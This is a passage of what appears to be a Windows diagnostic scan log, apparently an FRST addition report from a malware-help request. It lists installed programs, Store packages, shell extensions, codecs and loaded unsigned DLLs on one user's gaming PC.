Balanced (HKLM-x32\...\{0EA45DD4-A825-420C-AFED-C659EFE3B84F}) (Version: 4.00.0000 - Advanced Micro Devices, Inc.) Hidden
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
Discord (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Discord) (Version: 0.0.309 - Discord Inc.)
Dolphin (HKLM-x32\...\Dolphin) (Version: 5.0 - Dolphin Team)
EA app (HKLM\...\{C2622085-ABD2-49E5-8AB9-D3D6A642C091}) (Version: 12.0.229.5212 - Electronic Arts) Hidden
EA app (HKLM-x32\...\{c5b4b74e-fcb0-4603-b92d-3d17c96a6d69}) (Version: 12.0.229.5212 - Electronic Arts)
Epic Games Launcher (HKLM-x32\...\{0EE6DDEF-E36B-45EB-9E03-5A266EC8A8F8}) (Version: 1.1.279.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{F9C5C994-F6B9-4D75-B3E7-AD01B84073E9}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Epic Online Services (HKLM-x32\...\{4B31654B-80C2-405C-91C9-49B14AEB0F42}) (Version: 2.0.32.0 - Epic Games, Inc.)
Fallout: New Vegas (HKLM-x32\...\Fallout: New Vegas_is1) (Version:  - )
FL Studio 20 (HKLM-x32\...\FL Studio 20) (Version:  - Image-Line)
FL Studio ASIO (HKLM-x32\...\FL Studio ASIO) (Version:  - Image-Line)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 103.0.5060.114 - Google LLC)
Launcher Prerequisites (x64) (HKLM-x32\...\{43a03b9c-4770-409c-a999-587b60700b63}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
MEGAsync (HKLM-x32\...\MEGAsync) (Version:  - Mega Limited)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 103.0.1264.62 - Microsoft Corporation)
Microsoft Edge WebView2 Runtime (HKLM-x32\...\Microsoft EdgeWebView) (Version: 103.0.1264.49 - Microsoft Corporation)
Microsoft GameInput (HKLM-x32\...\{A9CFD6A1-C0D3-7F37-C220-8B104867EF15}) (Version: 10.1.22621.1011 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\OneDriveSetup.exe) (Version: 22.131.0619.0001 - Microsoft Corporation)
Microsoft Update Health Tools (HKLM\...\{7B1FCD52-8F6B-4F12-A143-361EA39F5E7C}) (Version: 3.67.0.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030 (HKLM\...\{37B8F9C7-03FB-3253-8781-2517C99D7C00}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030 (HKLM\...\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 (HKLM-x32\...\{B175520C-86A2-35A7-8619-86DC379688B9}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 (HKLM-x32\...\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40664 (HKLM-x32\...\{042d26ef-3dbe-4c25-95d3-4c1b11b235a7}) (Version: 12.0.40664.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40664 (HKLM-x32\...\{9dff3540-fc85-4ed5-ac84-9e3c7fd8bece}) (Version: 12.0.40664.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.40664 (HKLM\...\{010792BA-551A-3AC0-A7EF-0FAB4156C382}) (Version: 12.0.40664 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.40664 (HKLM\...\{53CF6934-A98D-3D84-9146-FC4EDF3D5641}) (Version: 12.0.40664 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.40664 (HKLM-x32\...\{D401961D-3A20-3AC7-943B-6139D5BD490A}) (Version: 12.0.40664 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.40664 (HKLM-x32\...\{8122DAB1-ED4D-3676-BB0A-CA368196543E}) (Version: 12.0.40664 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.28.29334 (HKLM-x32\...\{b2d0f752-adc5-496e-8f70-8669de01f746}) (Version: 14.28.29334.0 - Microsoft Corporation)
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.30.30704 (HKLM-x32\...\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}) (Version: 14.30.30704.0 - Microsoft Corporation)
Microsoft Visual C++ 2019 X86 Additional Runtime - 14.28.29334 (HKLM-x32\...\{14C49FC8-3E9B-4F29-8526-26629B5CF30B}) (Version: 14.28.29334 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.28.29334 (HKLM-x32\...\{0D01A812-82A1-481F-8546-8E28E976F8DF}) (Version: 14.28.29334 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.30.30704 (HKLM\...\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}) (Version: 14.30.30704 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.30.30704 (HKLM\...\{662A0088-6FCD-45DD-9EA7-68674058AED5}) (Version: 14.30.30704 - Microsoft Corporation) Hidden
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Minecraft Launcher (HKLM-x32\...\{27B34E47-68AE-4802-822A-9F0C187AF84A}) (Version: 1.0.0.0 - Mojang)
Mozilla Firefox (x64 en-US) (HKLM\...\Mozilla Firefox 102.0.1 (x64 en-US)) (Version: 102.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 89.0.2 - Mozilla)
NVIDIA FrameView SDK 1.2.7521.31103277 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_FrameViewSdk) (Version: 1.2.7521.31103277 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.25.1.27 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.25.1.27 - NVIDIA Corporation)
NVIDIA Graphics Driver 512.59 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 512.59 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.39.3 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.39.3 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.21.0713 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.21.0713 - NVIDIA Corporation)
NVIDIA USBC Driver 1.46.831.832 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_USBC) (Version: 1.46.831.832 - NVIDIA Corporation)
OEM Application Profile (HKLM-x32\...\{84AD2AF7-10C8-0395-66F9-FFAEB4C5DBF1}) (Version: 1.00.0000 - Advanced Micro Devices, Inc.)
ONN. (HKLM-x32\...\ONN.) (Version: 1.0.0.5.05 - )
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
Origin (HKLM-x32\...\Origin) (Version: 10.5.113.50894 - Electronic Arts, Inc.)
Overwatch (HKLM-x32\...\Overwatch) (Version:  - Blizzard Entertainment)
PCSX2 - Playstation 2 Emulator (HKLM-x32\...\pcsx2) (Version: 1.6.0 - PCSX2 Team)
qBittorrent 4.4.2 (HKLM-x32\...\qBittorrent) (Version: 4.4.2 - The qBittorrent project)
r2modman 3.1.25 (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\ac231ef6-6414-5f8d-b36f-3b57705721dd) (Version: 3.1.25 - ebkr)
RestMinder version 1.0.0.1 (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\{F481E04A-B87F-46D3-8FC5-A3440DE071C9}_is1) (Version: 1.0.0.1 - RestMinder)
Riot Vanguard (HKLM\...\Riot Vanguard) (Version:  - Riot Games, Inc.)
Roblox Player for Miggy (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\roblox-player) (Version:  - Roblox Corporation)
Spotify (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Spotify) (Version: 1.1.89.862.g94554d24 - Spotify AB)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Streamlabs Desktop 1.6.4 (HKLM\...\029c4619-0385-5543-9426-46f9987161d9) (Version: 1.6.4 - General Workings, Inc.)
TeamViewer (HKLM-x32\...\TeamViewer) (Version: 15.8.3 - TeamViewer)
Ubisoft Connect (HKLM-x32\...\Uplay) (Version: 112.3 - Ubisoft)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{0BAA0A93-3AD3-4B19-9105-4C8C3FA92A83}) (Version: 2.67.0.0 - Microsoft Corporation) Hidden
Update for Windows 10 for x64-based Systems (KB4480730) (HKLM\...\{0746492E-47B6-4251-940C-44462DFD74BB}) (Version: 2.55.0.0 - Microsoft Corporation)
UpdateAssistant (HKLM\...\{F339C545-24DC-4870-AA32-6EB6B0500B95}) (Version: 1.24.0.0 - Microsoft Corporation) Hidden
UXP WebView Support (HKLM-x32\...\UXPW_1_1_0) (Version: 1.1.0 - Adobe Inc.)
VALORANT (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Riot Game valorant.live) (Version:  - Riot Games, Inc)
Vortex (HKLM\...\57979c68-f490-55b8-8fed-8b017a5af2fe) (Version: 1.5.13 - Black Tree Gaming Ltd.)
Windows 10 Update Assistant (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.22925 - Microsoft Corporation)
Windows PC Health Check (HKLM\...\{77ACFAF7-E5AB-410D-BA14-BBEBF89422DE}) (Version: 3.1.2109.29003 - Microsoft Corporation)
Zoom (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\ZoomUMX) (Version: 5.10.4 (5035) - Zoom Video Communications, Inc.)
 
Packages:
=========
Adobe Notification Client -> C:\Program Files\WindowsApps\AdobeNotificationClient_3.0.1.1_x86__enpm4xejd91yc [2022-04-20] (Adobe Systems Incorporated)
BreeZip -> C:\Program Files\WindowsApps\3138AweZip.AweZip_1.4.15.0_x86__ffd303wmbhcjt [2022-07-13] (BreeZip)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2021-03-15] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2021-03-15] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.13.7040.0_x64__8wekyb3d8bbwe [2022-07-13] (Microsoft Studios) [MS Ad]
Minecraft Launcher -> C:\Program Files\WindowsApps\Microsoft.4297127D64EC6_1.1.17.0_x64__8wekyb3d8bbwe [2022-06-08] (Microsoft Studios)
NVIDIA Control Panel -> C:\Program Files\WindowsApps\NVIDIACorp.NVIDIAControlPanel_8.1.962.0_x64__56jybvy8sckqj [2022-04-26] (NVIDIA Corp.)
Photos Media Engine Add-on -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2022-01-07] (Microsoft Corporation)
Realtek Audio Control -> C:\Program Files\WindowsApps\RealtekSemiconductorCorp.RealtekAudioControl_1.2.175.0_x64__dt26b99r8h8gj [2020-07-31] (Realtek Semiconductor Corp)
Visage -> C:\Program Files\WindowsApps\SadSquareStudio.Visage_1.1.0.0_x64__855q6fdw1qbrg [2022-06-22] (SadSquare Studio)
WhatsApp Desktop -> C:\Program Files\WindowsApps\5319275A.WhatsAppDesktop_2.2222.12.0_x64__cv1g1gvanyjgm [2022-07-01] (WhatsApp Inc.)
Word Mobile -> C:\Program Files\WindowsApps\Microsoft.Office.Word_16001.14326.21062.0_x64__8wekyb3d8bbwe [2022-07-13] (Microsoft Corporation)
 
==================== Custom CLSID (Whitelisted): ==============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020421-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020422-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020423-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020425-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{0E270DAA-1BE6-48F2-AC49-317A81924068} -> [Creative Cloud Files] => C:\Users\Miggy\Creative Cloud Files [2020-08-04 16:40]
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{2F81B25E-7507-4844-BFF2-77D2CC24CED4}\localserver32 -> C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe (Adobe Inc. -> Adobe Inc.)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{9E121B07-D732-48C1-94D0-77C233EAE0F3} -> [MEGAsync] => C:\Users\Miggy\Documents\MEGAsync [2022-06-05 15:01]
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{d1b22d3d-8585-53a6-acb3-0e803c7e8d2a}\localserver32 -> "C:\Users\Miggy\AppData\Local\Microsoft\Teams\current\Teams.exe" --toast => No File
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Inc. -> Adobe Systems)
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-06-23] (Mega Limited -> )
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-06-23] (Mega Limited -> )
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-06-23] (Mega Limited -> )
ShellIconOverlayIdentifiers: [   AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2022-06-29] (Adobe Inc. -> )
ShellIconOverlayIdentifiers: [   AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2022-06-29] (Adobe Inc. -> )
ShellIconOverlayIdentifiers: [   AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2022-06-29] (Adobe Inc. -> )
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2021-05-06] (Igor Pavlov) [File not signed]
ContextMenuHandlers1: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2022-06-29] (Adobe Inc. -> )
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-06-23] (Mega Limited -> )
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-06-23] (Mega Limited -> )
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-06-23] (Mega Limited -> )
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2021-05-06] (Igor Pavlov) [File not signed]
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-06-23] (Mega Limited -> )
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files\AMD\CNext\CNext\atiacm64.dll [2017-04-24] (Advanced Micro Devices, Inc.) [File not signed]
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_4d7400884d0d52e3\nvshext.dll [2022-04-21] (Nvidia Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2021-05-06] (Igor Pavlov) [File not signed]
ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2022-06-29] (Adobe Inc. -> )
 
==================== Codecs (Whitelisted) ====================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Drivers32: [vidc.VP60] => C:\WINDOWS\SysWOW64\vp6vfw.dll [447752 2014-09-16] (Electronic Arts -> On2.com)
HKLM\...\Drivers32: [vidc.VP61] => C:\WINDOWS\SysWOW64\vp6vfw.dll [447752 2014-09-16] (Electronic Arts -> On2.com)
 
==================== Shortcuts & WMI ========================
 
==================== Loaded Modules (Whitelisted) =============
 
2021-10-18 17:33 - 2021-09-06 12:55 - 000033792 _____ () [File not signed] [File is in use] C:\Users\Miggy\AppData\Local\Programs\RestMinder\Gh.Common.dll
2022-07-12 17:36 - 2021-11-11 04:03 - 001495552 _____ () [File not signed] C:\Program Files (x86)\ONN\DuiLib.dll
2022-07-12 17:36 - 2018-09-06 03:45 - 000045056 _____ () [File not signed] C:\Program Files (x86)\ONN\HookDLL.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000015360 _____ () [File not signed] C:\Program Files (x86)\Origin\libEGL.DLL
2022-07-05 18:54 - 2022-07-05 18:54 - 003090944 _____ () [File not signed] C:\Program Files (x86)\Origin\libGLESv2.dll
2020-12-26 15:42 - 2022-03-03 19:23 - 126965248 _____ () [File not signed] C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\libcef.dll
2020-12-26 15:42 - 2021-11-17 04:38 - 000384000 _____ () [File not signed] C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\libegl.dll
2020-12-26 15:42 - 2021-11-17 04:38 - 008006656 _____ () [File not signed] C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\libglesv2.dll
2021-10-18 17:33 - 2021-09-06 10:18 - 012201136 _____ () [File not signed] C:\Users\Miggy\AppData\Local\Programs\RestMinder\sdk.dll
2022-07-12 17:36 - 2019-07-18 06:35 - 000049152 _____ (0) [File not signed] C:\Program Files (x86)\ONN\CommFunc.dll
2022-07-12 17:36 - 2019-08-17 03:25 - 000119296 _____ (0) [File not signed] C:\Program Files (x86)\ONN\DrvInDll.dll
2021-10-18 17:33 - 2021-06-16 14:44 - 000117248 _____ (Countly) [File not signed] [File is in use] C:\Users\Miggy\AppData\Local\Programs\RestMinder\Countly.dll
2021-10-18 17:33 - 2018-01-10 14:34 - 000024064 _____ (Daniel Grunwald, Omer Mor, Alex Davies, jnm2) [File not signed] [File is in use] C:\Users\Miggy\AppData\Local\Programs\RestMinder\AsyncBridge.Net35.dll
2021-06-27 21:31 - 2021-05-06 00:00 - 000077824 _____ (Igor Pavlov) [File not signed] C:\Program Files\7-Zip\7-zip.dll
2021-10-18 17:33 - 2018-03-24 18:44 - 000475136 _____ (Newtonsoft) [File not signed] [File is in use] C:\Users\Miggy\AppData\Local\Programs\RestMinder\Newtonsoft.Json.dll
2021-10-18 17:33 - 2018-05-11 09:52 - 000074240 _____ (Sentry) [File not signed] [File is in use] C:\Users\Miggy\AppData\Local\Programs\RestMinder\SharpRaven.dll
2020-12-26 15:42 - 2022-03-03 19:23 - 000983552 _____ (The Chromium Authors) [File not signed] C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\chrome_elf.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000002560 _____ (The ICU Project) [File not signed] C:\Program Files (x86)\Origin\icudt58.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 001252864 _____ (The ICU Project) [File not signed] C:\Program Files (x86)\Origin\icuuc58.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 001282048 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files (x86)\Origin\LIBEAY32.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000279040 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files (x86)\Origin\ssleay32.dll
2022-07-14 23:10 - 2022-07-14 23:10 - 002815488 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\libcrypto-1_1-x64.dll
2022-07-14 23:10 - 2022-07-14 23:10 - 000678400 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\libssl-1_1-x64.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000030208 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\imageformats\qgif.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000032768 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\imageformats\qico.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000256512 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\imageformats\qjpeg.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000026112 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\imageformats\qtga.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000305152 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\imageformats\qtiff.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000025600 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\imageformats\qwbmp.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 001611264 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\platforms\qwindows.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 005487104 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Core.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 005841920 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Gui.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000709120 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Multimedia.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 001179136 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Network.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000207360 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Positioning.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000310272 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5PrintSupport.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 003513344 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Qml.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 003390976 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Quick.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000068096 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5QuickWidgets.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000045568 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5TextToSpeech.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000116224 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5WebChannel.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 054071296 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5WebEngineCore.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000211456 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5WebEngineWidgets.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000146432 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5WebSockets.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 005089792 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Widgets.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000184832 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Xml.dll
2022-07-14 23:10 - 2022-07-14 23:10 - 000046592 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\bearer\qgenericbearer.dll
